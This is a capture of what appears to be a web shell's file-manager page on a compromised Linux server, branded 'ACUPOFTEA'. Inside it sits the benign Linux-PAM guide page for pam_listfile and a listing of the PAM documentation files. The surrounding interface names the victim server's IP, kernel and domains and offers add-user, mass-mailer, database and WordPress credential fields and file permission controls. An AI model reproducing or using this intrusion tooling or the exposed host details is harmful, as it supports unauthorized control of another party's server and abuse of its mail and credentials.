System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
doc
/
pam
/
html
/
216.73.216.38
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
sag-pam_listfile.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>6.16. pam_listfile - deny or allow services based on an arbitrary file</title><meta name="generator" content="DocBook XSL Stylesheets Vsnapshot"><link rel="home" href="Linux-PAM_SAG.html" title="The Linux-PAM System Administrators' Guide"><link rel="up" href="sag-module-reference.html" title="Chapter 6. A reference guide for available modules"><link rel="prev" href="sag-pam_limits.html" title="6.15. pam_limits - limit resources"><link rel="next" href="sag-pam_localuser.html" title="6.17. pam_localuser - require users to be listed in /etc/passwd"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">6.16. pam_listfile - deny or allow services based on an arbitrary file</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="sag-pam_limits.html">Prev</a> </td><th width="60%" align="center">Chapter 6. A reference guide for available modules</th><td width="20%" align="right"> <a accesskey="n" href="sag-pam_localuser.html">Next</a></td></tr></table><hr></div><div class="section"><div class="titlepage"><div><div><h2 class="title" style="clear: both"><a name="sag-pam_listfile"></a>6.16. pam_listfile - deny or allow services based on an arbitrary file</h2></div></div></div><div class="cmdsynopsis"><p><code class="command">pam_listfile.so</code> item=[tty|user|rhost|ruser|group|shell] sense=[allow|deny] file=<em class="replaceable"><code>/path/filename</code></em> onerr=[succeed|fail] [ apply=[<em class="replaceable"><code>user</code></em>|<em class="replaceable"><code>@group</code></em>] ] [ quiet ]</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-description"></a>6.16.1. DESCRIPTION</h3></div></div></div><p> pam_listfile is a PAM module which provides a way to deny or allow services based on an arbitrary file. </p><p> The module gets the <code class="option">item</code> of the type specified -- <span class="emphasis"><em>user</em></span> specifies the username, <span class="emphasis"><em>PAM_USER</em></span>; tty specifies the name of the terminal over which the request has been made, <span class="emphasis"><em>PAM_TTY</em></span>; rhost specifies the name of the remote host (if any) from which the request was made, <span class="emphasis"><em>PAM_RHOST</em></span>; and ruser specifies the name of the remote user (if available) who made the request, <span class="emphasis"><em>PAM_RUSER</em></span> -- and looks for an instance of that item in the <code class="option">file=<em class="replaceable"><code>filename</code></em></code>. <code class="filename">filename</code> contains one line per item listed. If the item is found, then if <code class="option">sense=<em class="replaceable"><code>allow</code></em></code>, <span class="emphasis"><em>PAM_SUCCESS</em></span> is returned, causing the authorization request to succeed; else if <code class="option">sense=<em class="replaceable"><code>deny</code></em></code>, <span class="emphasis"><em>PAM_AUTH_ERR</em></span> is returned, causing the authorization request to fail. </p><p> If an error is encountered (for instance, if <code class="filename">filename</code> does not exist, or a poorly-constructed argument is encountered), then if <span class="emphasis"><em>onerr=succeed</em></span>, <span class="emphasis"><em>PAM_SUCCESS</em></span> is returned, otherwise if <span class="emphasis"><em>onerr=fail</em></span>, <span class="emphasis"><em>PAM_AUTH_ERR</em></span> or <span class="emphasis"><em>PAM_SERVICE_ERR</em></span> (as appropriate) will be returned. </p><p> An additional argument, <code class="option">apply=</code>, can be used to restrict the application of the above to a specific user (<code class="option">apply=<em class="replaceable"><code>username</code></em></code>) or a given group (<code class="option">apply=<em class="replaceable"><code>@groupname</code></em></code>). This added restriction is only meaningful when used with the <span class="emphasis"><em>tty</em></span>, <span class="emphasis"><em>rhost</em></span> and <span class="emphasis"><em>shell</em></span> items. </p><p> Besides this last one, all arguments should be specified; do not count on any default behavior. </p><p> No credentials are awarded by this module. </p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-options"></a>6.16.2. OPTIONS</h3></div></div></div><p> </p><div class="variablelist"><dl class="variablelist"><dt><span class="term"> <code class="option">item=[tty|user|rhost|ruser|group|shell]</code> </span></dt><dd><p> What is listed in the file and should be checked for. </p></dd><dt><span class="term"> <code class="option">sense=[allow|deny]</code> </span></dt><dd><p> Action to take if found in file, if the item is NOT found in the file, then the opposite action is requested. </p></dd><dt><span class="term"> <code class="option">file=<em class="replaceable"><code>/path/filename</code></em></code> </span></dt><dd><p> File containing one item per line. The file needs to be a plain file and not world writable. </p></dd><dt><span class="term"> <code class="option">onerr=[succeed|fail]</code> </span></dt><dd><p> What to do if something weird happens like being unable to open the file. </p></dd><dt><span class="term"> <code class="option">apply=[<em class="replaceable"><code>user</code></em>|<em class="replaceable"><code>@group</code></em>]</code> </span></dt><dd><p> Restrict the user class for which the restriction apply. Note that with <code class="option">item=[user|ruser|group]</code> this does not make sense, but for <code class="option">item=[tty|rhost|shell]</code> it have a meaning. </p></dd><dt><span class="term"> <code class="option">quiet</code> </span></dt><dd><p> Do not treat service refusals or missing list files as errors that need to be logged. </p></dd></dl></div><p> </p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-types"></a>6.16.3. MODULE TYPES PROVIDED</h3></div></div></div><p> All module types (<code class="option">auth</code>, <code class="option">account</code>, <code class="option">password</code> and <code class="option">session</code>) are provided. </p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-return_values"></a>6.16.4. RETURN VALUES</h3></div></div></div><p> </p><div class="variablelist"><dl class="variablelist"><dt><span class="term">PAM_AUTH_ERR</span></dt><dd><p>Authentication failure.</p></dd><dt><span class="term">PAM_BUF_ERR</span></dt><dd><p> Memory buffer error. </p></dd><dt><span class="term">PAM_IGNORE</span></dt><dd><p> The rule does not apply to the <code class="option">apply</code> option. </p></dd><dt><span class="term">PAM_SERVICE_ERR</span></dt><dd><p> Error in service module. </p></dd><dt><span class="term">PAM_SUCCESS</span></dt><dd><p> Success. </p></dd></dl></div><p> </p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-examples"></a>6.16.5. EXAMPLES</h3></div></div></div><p> Classic 'ftpusers' authentication can be implemented with this entry in <code class="filename">/etc/pam.d/ftpd</code>: </p><pre class="programlisting"> # # deny ftp-access to users listed in the /etc/ftpusers file # auth required pam_listfile.so \ onerr=succeed item=user sense=deny file=/etc/ftpusers </pre><p> Note, users listed in <code class="filename">/etc/ftpusers</code> file are (counterintuitively) <span class="emphasis"><em>not</em></span> allowed access to the ftp service. </p><p> To allow login access only for certain users, you can use a <code class="filename">/etc/pam.d/login</code> entry like this: </p><pre class="programlisting"> # # permit login to users listed in /etc/loginusers # auth required pam_listfile.so \ onerr=fail item=user sense=allow file=/etc/loginusers </pre><p> For this example to work, all users who are allowed to use the login service should be listed in the file <code class="filename">/etc/loginusers</code>. Unless you are explicitly trying to lock out root, make sure that when you do this, you leave a way for root to log in, either by listing root in <code class="filename">/etc/loginusers</code>, or by listing a user who is able to <span class="emphasis"><em>su</em></span> to the root account. </p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_listfile-author"></a>6.16.6. AUTHOR</h3></div></div></div><p> pam_listfile was written by Michael K. Johnson <johnsonm@redhat.com> and Elliot Lee <sopwith@cuc.edu>. </p></div></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="sag-pam_limits.html">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="sag-module-reference.html">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="sag-pam_localuser.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">6.15. pam_limits - limit resources </td><td width="20%" align="center"><a accesskey="h" href="Linux-PAM_SAG.html">Home</a></td><td width="40%" align="right" valign="top"> 6.17. pam_localuser - require users to be listed in /etc/passwd</td></tr></table></div></body></html>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:24
..
DIR
-
drwxr-xr-x
2025-08-28 10:58:24
Linux-PAM_SAG.html
text/html
8.98 KB
-rw-r--r--
2025-08-26 08:58:50
sag-author.html
text/html
3.04 KB
-rw-r--r--
2025-08-26 08:58:50
sag-configuration-directory.html
text/html
2.9 KB
-rw-r--r--
2025-08-26 08:58:50
sag-configuration-example.html
text/html
5.39 KB
-rw-r--r--
2025-08-26 08:58:50
sag-configuration-file.html
text/html
17.11 KB
-rw-r--r--
2025-08-26 08:58:50
sag-configuration.html
text/html
2.99 KB
-rw-r--r--
2025-08-26 08:58:50
sag-copyright.html
text/html
3.53 KB
-rw-r--r--
2025-08-26 08:58:50
sag-introduction.html
text/html
4.34 KB
-rw-r--r--
2025-08-26 08:58:50
sag-module-reference.html
text/html
37.26 KB
-rw-r--r--
2025-08-26 08:58:50
sag-overview.html
text/html
7.81 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_access.html
text/html
17.7 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_cracklib.html
text/html
19.8 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_debug.html
text/html
7.9 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_deny.html
text/html
4.59 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_echo.html
text/html
5.62 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_env.html
text/html
12.5 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_exec.html
text/html
8.17 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_faildelay.html
text/html
4.48 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_filter.html
text/html
9.12 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_ftp.html
text/html
6.06 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_group.html
text/html
9.9 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_issue.html
text/html
6.23 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_keyinit.html
text/html
6.85 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_lastlog.html
text/html
8.32 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_limits.html
text/html
17.69 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_listfile.html
text/html
10.29 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_localuser.html
text/html
5.32 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_loginuid.html
text/html
5.09 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_mail.html
text/html
7.58 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_mkhomedir.html
text/html
6.05 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_motd.html
text/html
7.57 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_namespace.html
text/html
20.16 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_nologin.html
text/html
5.21 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_permit.html
text/html
4.2 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_pwhistory.html
text/html
8.28 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_rhosts.html
text/html
6.25 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_rootok.html
text/html
4.99 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_securetty.html
text/html
6.33 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_selinux.html
text/html
8.12 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_shells.html
text/html
4.16 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_succeed_if.html
text/html
8.94 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_time.html
text/html
9.5 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_timestamp.html
text/html
6.73 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_umask.html
text/html
6.17 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_unix.html
text/html
14.7 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_userdb.html
text/html
8.38 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_warn.html
text/html
4.46 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_wheel.html
text/html
7.01 KB
-rw-r--r--
2025-08-26 08:58:50
sag-pam_xauth.html
text/html
8.22 KB
-rw-r--r--
2025-08-26 08:58:50
sag-security-issues-other.html
text/html
2.92 KB
-rw-r--r--
2025-08-26 08:58:50
sag-security-issues-wrong.html
text/html
2.89 KB
-rw-r--r--
2025-08-26 08:58:50
sag-security-issues.html
text/html
2.11 KB
-rw-r--r--
2025-08-26 08:58:50
sag-see-also.html
text/html
2.23 KB
-rw-r--r--
2025-08-26 08:58:50
sag-text-conventions.html
text/html
3.11 KB
-rw-r--r--
2025-08-26 08:58:50
~ ACUPOFTEA - mail.ontime-ae.com